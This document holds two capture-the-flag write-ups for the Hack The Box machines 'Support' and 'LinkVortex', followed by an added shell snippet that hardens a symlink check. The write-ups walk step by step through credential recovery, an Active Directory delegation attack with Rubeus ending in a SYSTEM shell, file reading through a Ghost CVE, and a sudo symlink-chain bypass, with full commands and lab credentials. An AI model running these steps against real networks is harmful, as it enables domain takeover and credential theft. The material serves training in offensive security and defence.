Hack The Box – Support Writeup

This is a writeup of the HackTheBox machine “Support”.

User Flag

Perform a port scan.

$ nmap -Pn -sCV -A -T4 -p- -oN nmap_result 10.10.11.174
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-04-09 13:31:34Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp  open  mc-nmf        .NET Message Framing
49664/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49674/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49686/tcp open  msrpc         Microsoft Windows RPC
49699/tcp open  msrpc         Microsoft Windows RPC
49741/tcp open  msrpc         Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2022|2012|2016 (89%)
OS CPE: cpe:/o:microsoft:windows_server_2022 cpe:/o:microsoft:windows_server_2012:r2 cpe:/o:microsoft:windows_server_2016
Aggressive OS guesses: Microsoft Windows Server 2022 (89%), Microsoft Windows Server 2012 R2 (85%), Microsoft Windows Server 2016 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2025-04-09T13:32:36
|_  start_date: N/A
|_clock-skew: 1s
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required

This shows which ports are open and what services they run.

Now that I know the domain name, I will add it to /etc/hosts.

10.10.11.174    support.htb

I queried DNS and found the subdomain dc.support.htb, so I will add it to /etc/hosts as well.

$ dig @10.10.11.174 support.htb any

;; ANSWER SECTION:
support.htb.            600     IN      A       10.10.11.174
support.htb.            3600    IN      NS      dc.support.htb.
support.htb.            3600    IN      SOA     dc.support.htb. hostmaster.support.htb. 107 900 600 86400 3600

Start with SMB enumeration.

Enumerating share names, I found a share called support-tools.

$ smbclient -N -L 10.10.11.174

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share 
        support-tools   Disk      support staff tools
        SYSVOL          Disk      Logon server share

Browsing support-tools, I found multiple exe and zip files.

$ smbclient -N //10.10.11.174/support-tools
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Wed Jul 20 13:01:06 2022
  ..                                  D        0  Sat May 28 07:18:25 2022
  7-ZipPortable_21.07.paf.exe         A  2880728  Sat May 28 07:19:19 2022
  npp.8.4.1.portable.x64.zip          A  5439245  Sat May 28 07:19:55 2022
  putty.exe                           A  1273576  Sat May 28 07:20:06 2022
  SysinternalsSuite.zip               A 48102161  Sat May 28 07:19:31 2022
  UserInfo.exe.zip                    A   277499  Wed Jul 20 13:01:07 2022
  windirstat1_1_2_setup.exe           A    79171  Sat May 28 07:20:17 2022
  WiresharkPortable64_3.6.5.paf.exe      A 44398000  Sat May 28 07:19:43 2022

UserInfo.exe.zip looks suspicious, so I will download it.

smb: \> get UserInfo.exe.zip 
getting file \UserInfo.exe.zip of size 277499 as UserInfo.exe.zip (48.3 KiloBytes/sec) (average 48.3 KiloBytes/sec)

When I unzipped it, I got an executable called UserInfo.exe.

$ ls -la
total 944
drwxrwxr-x 2 kali kali   4096 Apr 12 11:44 .
drwxrwxr-x 3 kali kali   4096 Apr 12 11:43 ..
-rw-rw-rw- 1 kali kali  99840 Mar  1  2022 CommandLineParser.dll
-rw-rw-rw- 1 kali kali  22144 Oct 22  2021 Microsoft.Bcl.AsyncInterfaces.dll
-rw-rw-rw- 1 kali kali  47216 Oct 22  2021 Microsoft.Extensions.DependencyInjection.Abstractions.dll
-rw-rw-rw- 1 kali kali  84608 Oct 22  2021 Microsoft.Extensions.DependencyInjection.dll
-rw-rw-rw- 1 kali kali  64112 Oct 22  2021 Microsoft.Extensions.Logging.Abstractions.dll
-rw-rw-rw- 1 kali kali  20856 Feb 19  2020 System.Buffers.dll
-rw-rw-rw- 1 kali kali 141184 Feb 19  2020 System.Memory.dll
-rw-rw-rw- 1 kali kali 115856 May 15  2018 System.Numerics.Vectors.dll
-rw-rw-rw- 1 kali kali  18024 Oct 22  2021 System.Runtime.CompilerServices.Unsafe.dll
-rw-rw-rw- 1 kali kali  25984 Feb 19  2020 System.Threading.Tasks.Extensions.dll
-rwxrwxrwx 1 kali kali  12288 May 27  2022 UserInfo.exe
-rw-rw-rw- 1 kali kali    563 May 27  2022 UserInfo.exe.config

UserInfo.exe seems to be a .NET executable.

$ file UserInfo.exe        
UserInfo.exe: PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows, 3 sections

Decompile it with dnSpy.

In UserInfo.Services I saw that LdapQuery calls getPassword() and then connects to LDAP through a DirectoryEntry.

getPassword() decrypts enc_password; let's recover it.

Since LDAP communication is done in plain text, let’s capture the LDAP login process with Wireshark.

First, examine the commands the executable accepts.
It seems that a find or user argument is required.

$ mono UserInfo.exe

Usage: UserInfo.exe [options] [commands]

Options: 
  -v|--verbose        Verbose output                                    

Commands: 
  find                Find a user                                       
  user                Get information about a user

Looks like we also need the -username option.

$ mono UserInfo.exe user
Unable to parse command 'user' reason: Required option '-username' not found!

Execution succeeded.

$ mono UserInfo.exe user -username hello -v
[*] Getting data for hello
[-] Exception: No Such Object

When I checked wireshark, I was able to capture LDAP authentication packets.

When I checked the bindRequest packet data, I found a string that looked like a password.
Since the following packet is a bindResponse with success, authentication with this string seems to succeed.

LDAP enumeration with ldapsearch.

$ ldapsearch -x -H ldap://support.htb -D 'support\ldap' -w 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' -b 'DC=support, DC=htb' > ldapsearch_result

When I checked the results, I found a password-like string in the info attribute.

# support, Users, support.htb
dn: CN=support,CN=Users,DC=support,DC=htb
objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: user
cn: support

(omitted)

info: Ironside47pleasure40Watchful

Since port 5985 is open, I was able to connect with WinRM.

$ evil-winrm -u support -p 'Ironside47pleasure40Watchful' -i support.htb

*Evil-WinRM* PS C:\Users\support\Documents> whoami
support\support

I was able to get the user flag from Desktop/user.txt.

*Evil-WinRM* PS C:\Users\support\Documents> more ..\Desktop\user.txt
2b46946973813a3227dc277318e6809d

Root Flag

Enumerate the AD environment with BloodHound.
To do so, place sharphound.exe on the target machine and run it.

*Evil-WinRM* PS C:\Users\support\Documents> wget http://10.10.14.136/SharpHound.exe -o sharphound.exe
*Evil-WinRM* PS C:\Users\support\Documents> .\sharphound.exe

Download the created zip file and load it into BloodHound.

Under Outbound Object Control > Group Delegated Object Control for my account support@support.htb, I found one entry.

support@support.htb is a member of shared support accounts@support.htb, and that group has GenericAll over DC.support.htb.

Right-click GenericAll -> Help -> Windows Abuse to see how the permission can be abused.

This time, it seems that RBCD attacks can be used for privilege escalation.

ms-DS-MachineAccountQuota is 10, so up to 10 computer accounts can be added.

*Evil-WinRM* PS C:\Users\support\Documents> Get-ADObject -Identity ((Get-ADDomain).distinguishedname) -Properties ms-DS-MachineAccountQuota


DistinguishedName         : DC=support,DC=htb
ms-DS-MachineAccountQuota : 10
Name                      : support
ObjectClass               : domainDNS
ObjectGUID                : 553cd9a3-86c4-4d64-9e85-5146a98c868e

Verify with PowerView that RBCD is not already configured.

*Evil-WinRM* PS C:\Users\support\Documents> . ./PowerView.ps1
*Evil-WinRM* PS C:\Users\support\Documents> Get-DomainComputer DC | select name, msds-allowedtoactonbehalfofotheridentity

name msds-allowedtoactonbehalfofotheridentity
---- ----------------------------------------
DC   

Create a fake machine account with Powermad and add it to the domain.

*Evil-WinRM* PS C:\Users\support\Documents> . ./Powermad.ps1
*Evil-WinRM* PS C:\Users\support\Documents> New-MachineAccount -MachineAccount FAKE-COMP03 -Password $(ConvertTo-SecureString 'Password123' -AsPlainText -Force)
[+] Machine account FAKE-COMP03 added

I was able to add FAKE-COMP03.

*Evil-WinRM* PS C:\Users\support\Documents> Get-ADComputer -identity FAKE-COMP03


DistinguishedName : CN=FAKE-COMP03,CN=Computers,DC=support,DC=htb
DNSHostName       : FAKE-COMP03.support.htb
Enabled           : True
Name              : FAKE-COMP03
ObjectClass       : computer
ObjectGUID        : 75b3431a-c6ea-4069-8133-ba04103a153f
SamAccountName    : FAKE-COMP03$
SID               : S-1-5-21-1677581083-3380853377-188903654-5604
UserPrincipalName :

Add FAKE-COMP03 to the RBCD settings.
FAKE-COMP03 can now impersonate a domain administrator and request Kerberos tickets.

*Evil-WinRM* PS C:\Users\support\Documents> Set-ADComputer -Identity DC -PrincipalsAllowedToDelegateToAccount FAKE-COMP03$
*Evil-WinRM* PS C:\Users\support\Documents> Get-ADComputer -Identity DC -Properties PrincipalsAllowedToDelegateToAccount


DistinguishedName                    : CN=DC,OU=Domain Controllers,DC=support,DC=htb
DNSHostName                          : dc.support.htb
Enabled                              : True
Name                                 : DC
ObjectClass                          : computer
ObjectGUID                           : afa13f1c-0399-4f7e-863f-e9c3b94c4127
PrincipalsAllowedToDelegateToAccount : {CN=FAKE-COMP03,CN=Computers,DC=support,DC=htb}
SamAccountName                       : DC$
SID                                  : S-1-5-21-1677581083-3380853377-188903654-1000
UserPrincipalName                    :

Run the S4U attack.
We will request the ticket with Rubeus.

*Evil-WinRM* PS C:\Users\support\Documents> .\Rubeus.exe hash /password:Password123 /user:FAKE-COMP03$ /domain:support.htb

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.3.2


[*] Action: Calculate Password Hash(es)

[*] Input password             : Password123
[*] Input username             : FAKE-COMP03$
[*] Input domain               : support.htb
[*] Salt                       : SUPPORT.HTBhostfake-comp03.support.htb
[*]       rc4_hmac             : 58A478135A93AC3BF058A5EA0E8FDB71
[*]       aes128_cts_hmac_sha1 : 72D3D2472C10AB93EDDB8BB87C51E4A2
[*]       aes256_cts_hmac_sha1 : 560AF12B8DBBDA755C43F4492CBD19FEE8A4CAD073F94C344C7807D0BE8153B6
[*]       des_cbc_md5          : B6DFEA517A5EA7B6

The resulting rc4_hmac hash is used to generate a Kerberos ticket for the administrator.

*Evil-WinRM* PS C:\Users\support\Documents> .\Rubeus.exe s4u /user:FAKE-COMP03$ /rc4:58A478135A93AC3BF058A5EA0E8FDB71 /impersonateuser:Administrator /msdsspn:cifs/dc.support.htb /domain:support.htb /ptt

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.3.2

[*] Action: S4U

[*] Using rc4_hmac hash: 58A478135A93AC3BF058A5EA0E8FDB71
[*] Building AS-REQ (w/ preauth) for: 'support.htb\FAKE-COMP03$'
[*] Using domain controller: ::1:88
[+] TGT request successful!
[*] base64(ticket.kirbi):

      doIFhDCCBYCgAwIBBaEDAgEWooIEmDCCBJRhggSQMIIEjKADAgEFoQ0bC1NVUFBPUlQuSFRCoiAwHqAD

(omitted)


[*] Action: S4U

[*] Building S4U2self request for: 'FAKE-COMP03$@SUPPORT.HTB'
[*] Using domain controller: dc.support.htb (::1)
[*] Sending S4U2self request to ::1:88
[+] S4U2self success!
[*] Got a TGS for 'Administrator' to 'FAKE-COMP03$@SUPPORT.HTB'
[*] base64(ticket.kirbi):

    doIFrDCCBaigAwIBBaEDAgEWooIExjCCBMJhggS+MIIEuqADAgEFoQ0bC1NVUFBPUlQuSFRCohkwF6AD

(omitted)

[*] Impersonating user 'Administrator' to target SPN 'cifs/dc.support.htb'
[*] Building S4U2proxy request for service: 'cifs/dc.support.htb'
[*] Using domain controller: dc.support.htb (::1)
[*] Sending S4U2proxy request to domain controller ::1:88
[+] S4U2proxy success!
[*] base64(ticket.kirbi) for SPN 'cifs/dc.support.htb':

      doIGaDCCBmSgAwIBBaEDAgEWooIFejCCBXZhggVyMIIFbqADAgEFoQ0bC1NVUFBPUlQuSFRCoiEwH6AD

(omitted)

[+] Ticket successfully imported!

Copy the value of the last ticket, reformat it into a single base64 line, and save it as ticket.kirbi.b64.

Decode the saved file with base64 and save it as ticket.kirbi.

$ base64 -d ticket.kirbi.b64 > ticket.kirbi

Finally, convert the ticket to a format that impacket can use.

$ impacket-ticketConverter ticket.kirbi ticket.ccache
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] converting kirbi to ccache...
[+] done

Use the ticket to get a shell with psexec.
I was able to get a shell as the SYSTEM account.

$ KRB5CCNAME=ticket.ccache impacket-psexec support.htb/administrator@dc.support.htb -k -no-pass
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Requesting shares on dc.support.htb.....
[*] Found writable share ADMIN$
[*] Uploading file mYVFUPYN.exe
[*] Opening SVCManager on dc.support.htb.....
[*] Creating service Tztr on dc.support.htb.....
[*] Starting service Tztr.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.20348.859]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\system32> whoami
nt authority\system

I was able to get the root flag from C:\Users\Administrator\Desktop\root.txt.

C:\Windows\system32> more C:\Users\Administrator\Desktop\root.txt
ba27ef32c706d15469541c11c323dd49

Hack The Box – LinkVortex Writeup


User Flag

Perform a port scan.

$ nmap -Pn -sVC -T4 -A -p- 10.10.11.47 -oN nmap_result
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 3e:f8:b9:68:c8:eb:57:0f:cb:0b:47:b9:86:50:83:eb (ECDSA)
|_  256 a2:ea:6e:e1:b6:d7:e7:c5:86:69:ce:ba:05:9e:38:13 (ED25519)
80/tcp open  http    Apache httpd
|_http-title: Did not follow redirect to http://linkvortex.htb/
|_http-server-header: Apache

This shows which ports are open and what services they run.

PORT   SERVICE   VERSION
22     ssh       OpenSSH 8.9p1
80     http      Apache

Now that you know the domain, add it to /etc/hosts.

10.10.11.47     linkvortex.htb

Access port 80.

From the footer, it turns out the site was built with an open source tool called ghost.

Do a directory scan.

$ dirsearch -u http://linkvortex.htb/ -x 404

[07:34:11] 301 -  179B  - /assets  ->  /assets/
[07:34:34] 200 -   15KB - /favicon.ico
[07:34:47] 200 -    1KB - /LICENSE
[07:35:11] 200 -  103B  - /robots.txt
[07:35:18] 200 -  256B  - /sitemap.xml

Accessing /robots.txt revealed further paths.

/robots.txt

User-agent: *
Sitemap: http://linkvortex.htb/sitemap.xml
Disallow: /ghost/
Disallow: /p/
Disallow: /email/
Disallow: /r/

When I accessed /ghost, a login form was displayed.

When I tried to authenticate as admin@linkvortex.htb, the error message confirmed that this account exists.


Enumerate subdomains.

$ ffuf -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -H "Host: FUZZ.linkvortex.htb" -u http://linkvortex.htb -fs 230

dev                     [Status: 200, Size: 2538, Words: 670, Lines: 116, Duration: 258ms]

I found dev.linkvortex.htb, added it to /etc/hosts, and accessed it.

Do a directory scan of the dev subdomain.

$ dirsearch -u http://dev.linkvortex.htb -x 404

[09:30:23] 301 -  239B  - /.git  ->  http://dev.linkvortex.htb/.git/        
[09:30:23] 200 -  557B  - /.git/
[09:30:23] 200 -  201B  - /.git/config
[09:30:23] 200 -   73B  - /.git/description
[09:30:23] 200 -  620B  - /.git/hooks/
[09:30:23] 200 -   41B  - /.git/HEAD
[09:30:23] 200 -  402B  - /.git/info/

(omitted)

Since /.git/ was found, download everything under it.

$ wget -r http://dev.linkvortex.htb/.git/

I was able to see multiple commits in the history.

$ git log --oneline
299cdb4 (HEAD, tag: v5.58.0) v5.58.0
dce2e68 Added Tips&Donations link to portal links (#17580)
3562560 Data generator: Ensure order of newsletters is correct

(omitted)

Checking the staged changes with git diff revealed a password.

$ git diff --staged

(omitted)
 
         it('complete setup', async function () {
             const email = 'test@example.com';
-            const password = 'thisissupersafe';
+            const password = 'OctopiFociPilfer45';

I was able to log in with the obtained password.

From the settings page I learned that the version is 5.58.0.

Searching for vulnerabilities in this version turned up CVE-2023-40028.
It seems that arbitrary files can be read by exploiting this vulnerability.

A publicly available PoC script for this CVE was used.

/etc/passwd was read successfully.

$ ./CVE-2023-40028.sh -u "admin@linkvortex.htb" -p "OctopiFociPilfer45"
file> /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
node:x:1000:1000::/home/node:/bin/bash

Checking the hostname suggests we are inside a Docker container.

file> /etc/hostname
7facf5f862ae

I would like to view the configuration file, but I don’t know the directory structure yet.
Let’s build the container locally to learn the directory layout inside it.

Download the official image from Docker Hub.

Run the commands from the official image page to pull and start it.

$ sudo docker pull ghost

$ sudo docker run -d --name some-ghost -e NODE_ENV=development ghost

When you enter the container, you are in /var/lib/ghost.

$ sudo docker exec -it some-ghost /bin/bash
root@85551094b4c0:/var/lib/ghost#

Listing the directory, I found config.production.json.
The same path, /var/lib/ghost/config.production.json, should give the corresponding information on the target machine.

# ls -la
total 40
drwxr-xr-x  1 node node 4096 Dec 10 01:30 .
drwxr-xr-x  1 root root 4096 Dec 10 01:29 ..
-rw-r--r--  1 node node   84 Dec 10 01:30 .ghost-cli
lrwxrwxrwx  1 node node   22 Dec 10 01:30 config.development.json -> config.production.json
-rw-r--r--  1 node node  295 Dec 10 01:30 config.production.json
drwxrwxrwt 11 node node 4096 Dec 10 17:26 content
drwxr-xr-x 11 node node 4096 Dec 10 01:29 content.orig
lrwxrwxrwx  1 node node   31 Dec 10 01:30 current -> /var/lib/ghost/versions/5.104.1
drwxr-xr-x  1 node node 4096 Dec 10 01:29 versions

When I read config.production.json on the target machine, I was able to get the SMTP credentials.

file> /var/lib/ghost/config.production.json
{
  "url": "http://localhost:2368",
  "server": {
    "port": 2368,
    "host": "::"
  },
  "mail": {
    "transport": "Direct"
  },
  "logging": {
    "transports": ["stdout"]
  },
  "process": "systemd",
  "paths": {
    "contentPath": "/var/lib/ghost/content"
  },
  "spam": {
    "user_login": {
        "minWait": 1,
        "maxWait": 604800000,
        "freeRetries": 5000
    }
  },
  "mail": {
     "transport": "SMTP",
     "options": {
      "service": "Google",
      "host": "linkvortex.htb",
      "port": 587,
      "auth": {
        "user": "bob@linkvortex.htb",
        "pass": "fibber-talented-worth"
        }
      }
    }
}

The SSH connection was successful with the obtained credentials.

$ ssh bob@linkvortex.htb
bob@linkvortex:~$

I was able to get the user flag from /home/bob/user.txt.

$ cat user.txt 
f45a09ebd41243969ef945b549ec7a5f

Root Flag

Checking sudo -l, it seems that /opt/ghost/clean_symlink.sh can be run as root.

$ sudo -l
Matching Defaults entries for bob on linkvortex:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
    use_pty, env_keep+=CHECK_CONTENT

User bob may run the following commands on linkvortex:
    (ALL) NOPASSWD: /usr/bin/bash /opt/ghost/clean_symlink.sh *.png

Check what /opt/ghost/clean_symlink.sh does.

/opt/ghost/clean_symlink.sh

#!/bin/bash

QUAR_DIR="/var/quarantined"

if [ -z $CHECK_CONTENT ];then
  CHECK_CONTENT=false
fi

LINK=$1

if ! [[ "$LINK" =~ \.png$ ]]; then
  /usr/bin/echo "! First argument must be a png file !"
  exit 2
fi

if /usr/bin/sudo /usr/bin/test -L $LINK;then
  LINK_NAME=$(/usr/bin/basename $LINK)
  LINK_TARGET=$(/usr/bin/readlink $LINK)
  if /usr/bin/echo "$LINK_TARGET" | /usr/bin/grep -Eq '(etc|root)';then
    /usr/bin/echo "! Trying to read critical files, removing link [ $LINK ] !"
    /usr/bin/unlink $LINK
  else
    /usr/bin/echo "Link found [ $LINK ] , moving it to quarantine"
    /usr/bin/mv $LINK $QUAR_DIR/
    if $CHECK_CONTENT;then
      /usr/bin/echo "Content:"
      /usr/bin/cat $QUAR_DIR/$LINK_NAME 2>/dev/null
    fi
  fi
fi

If the CHECK_CONTENT environment variable is not set, it is set to false.

if [ -z $CHECK_CONTENT ];then
  CHECK_CONTENT=false
fi

It takes the script's first argument and checks whether the file name ends with .png.

LINK=$1

if ! [[ "$LINK" =~ \.png$ ]]; then
  /usr/bin/echo "! First argument must be a png file !"
  exit 2
fi

If the PNG file given as the argument is a symlink, it takes the file name and checks whether the link target contains etc or root.

If so, it deletes the link.

If not, it moves the file to /var/quarantined, and if CHECK_CONTENT is true, it displays the linked file with cat.

if /usr/bin/sudo /usr/bin/test -L $LINK;then
  LINK_NAME=$(/usr/bin/basename $LINK)
  LINK_TARGET=$(/usr/bin/readlink $LINK)
  if /usr/bin/echo "$LINK_TARGET" | /usr/bin/grep -Eq '(etc|root)';then
    /usr/bin/echo "! Trying to read critical files, removing link [ $LINK ] !"
    /usr/bin/unlink $LINK
  else
    /usr/bin/echo "Link found [ $LINK ] , moving it to quarantine"
    /usr/bin/mv $LINK $QUAR_DIR/
    if $CHECK_CONTENT;then
      /usr/bin/echo "Content:"
      /usr/bin/cat $QUAR_DIR/$LINK_NAME 2>/dev/null
    fi
  fi
fi

It seems that /root/root.txt can be read through the final cat command.
First, satisfy the conditional branch by setting CHECK_CONTENT to true.

$ CHECK_CONTENT=true
$ export CHECK_CONTENT
$ printenv | grep CHECK_CONTENT
CHECK_CONTENT=true

Next, create a symbolic link.
In this case, we use a symbolic link chain to get past the etc/root string check.

Create a.png as a link to /root/root.txt.
Then create b.png as a link to /var/quarantined/a.png.

$ ln -s /root/root.txt a.png
$ ln -s /var/quarantined/a.png b.png
$ ls -la
total 8
drwxr-xr-x  2 bob  bob  4096 Dec 10 19:17 .
drwxr-xr-x 14 root root 4096 Nov 29 15:58 ..
lrwxrwxrwx  1 bob  bob    14 Dec 10 19:17 a.png -> /root/root.txt
lrwxrwxrwx  1 bob  bob    22 Dec 10 19:17 b.png -> /var/quarantined/a.png

By running /opt/ghost/clean_symlink.sh with b.png as the argument, I was able to get the flag from /root/root.txt.

$ sudo /usr/bin/bash /opt/ghost/clean_symlink.sh /var/quarantined/b.png 
Link found [ /var/quarantined/b.png ] , moving it to quarantine
/usr/bin/mv: '/var/quarantined/b.png' and '/var/quarantined/b.png' are the same file
Content:
6a8d12b830755445dc3634720f45860c
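As an added example, not part of the original writeup or the box's own script, the snippet below places the script's one-hop check next to a hardened version that follows the whole symlink chain with readlink -f and compares the resolved path against a protected prefix rather than a substring grep. The temp-dir layout (secret/ standing in for /root, quar/ for /var/quarantined) is constructed so it runs unprivileged; it assumes GNU coreutils.

```shell
#!/bin/bash
# Added example: why the check in /opt/ghost/clean_symlink.sh misses a symlink chain.
# The script calls `readlink` once, so for b.png -> quar/a.png -> secret/root.txt it
# only ever sees "quar/a.png" and the grep for '(etc|root)' never fires.

# What the original script compares: the first hop only.
one_hop_target() { readlink -- "$1"; }

# Every hop followed, including symlinks in parent directories.
final_target() { readlink -f -- "$1"; }

# The original script's decision: substring grep on the first hop.
# Returns 0 when it would flag the link as critical.
original_check() { one_hop_target "$1" | grep -Eq '(etc|root)'; }

# Hardened decision: is_critical_target LINK PROTECTED_DIR...
# Returns 0 when the fully resolved target lies under any PROTECTED_DIR.
# An unresolvable link is treated as critical (fail closed).
is_critical_target() {
  local link resolved dir
  link="$1"; shift
  resolved=$(readlink -f -- "$link") || return 0
  for dir in "$@"; do
    case "$resolved" in
      "$dir"|"$dir"/*) return 0 ;;
    esac
  done
  return 1
}

# Builds the box's layout in a temp dir (constructed): <dir>/secret stands in for
# /root and <dir>/quar for /var/quarantined. Prints the canonical <dir>.
build_demo_chain() {
  local d
  d=$(readlink -f -- "$(mktemp -d)")
  mkdir -p "$d/secret" "$d/quar"
  printf 'flag\n' > "$d/secret/root.txt"
  ln -s "$d/secret/root.txt" "$d/quar/a.png"   # a.png -> protected file
  ln -s "$d/quar/a.png" "$d/b.png"             # b.png -> a.png (the chain)
  printf '%s\n' "$d"
}

# Stand-alone demo: the original check lets the chain through, the hardened one blocks it.
D=$(build_demo_chain)
printf 'one hop : %s\n' "$(one_hop_target "$D/b.png")"
printf 'resolved: %s\n' "$(final_target "$D/b.png")"
if original_check "$D/b.png"; then echo "original check: blocked"; else echo "original check: allowed (bypassed)"; fi
if is_critical_target "$D/b.png" "$D/secret"; then echo "hardened check: blocked"; else echo "hardened check: allowed"; fi
rm -rf "$D"
```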